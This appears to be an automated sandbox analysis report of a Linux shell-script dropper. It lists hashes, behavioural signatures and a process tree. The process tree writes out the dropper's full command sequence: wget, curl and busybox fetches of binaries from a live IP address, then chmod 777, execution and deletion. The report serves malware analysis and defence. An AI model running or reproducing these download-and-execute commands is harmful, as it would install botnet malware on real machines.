Analysis
-
max time kernel
16s -
max time network
43s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
-
Size
10KB
-
MD5
26f371cd3359d8f6a45ccc544288c804
-
SHA1
35bd60ad220991f844f9862e522418bc05563390
-
SHA256
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce
-
SHA512
2729bf8db10105d916290630952e3067a9f8f09aa7ae41abbe4ba4b44d26b55872829cbe0a605d526abae197a6dafb93ee254f30ac20bf7ce04bea8b41cb3ef0
-
SSDEEP
192:k47/XwgW6ozLldOY4Z6zJnzLldOYZM7/Xwg+w:kN5zLlcY4Z6zJnzLlcY3w
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 7 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 758 chmod 778 chmod 800 chmod 806 chmod 812 chmod 715 chmod 739 chmod -
Executes dropped EXE 7 IoCs
ioc pid Process /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy 716 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 742 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat 759 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c 779 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E 801 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y 807 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT 813 Lo46YywIia327erXTugKxcchWtLwMJPGmT -
Checks CPU configuration 1 TTPs 7 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y curl File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT curl File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy curl File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 curl File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat curl File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c curl File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E curl
Processes
-
/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh1⤵PID:668
-
/bin/rm/bin/rm bins.sh2⤵PID:670
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:672
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:709
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:715
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:716
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:717
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:719
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:733
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:745
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:746
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:757
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:760
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:761
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:772
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:780
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:782
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:796
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:802
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:803
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:805
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:808
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:809
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:811
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:815
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97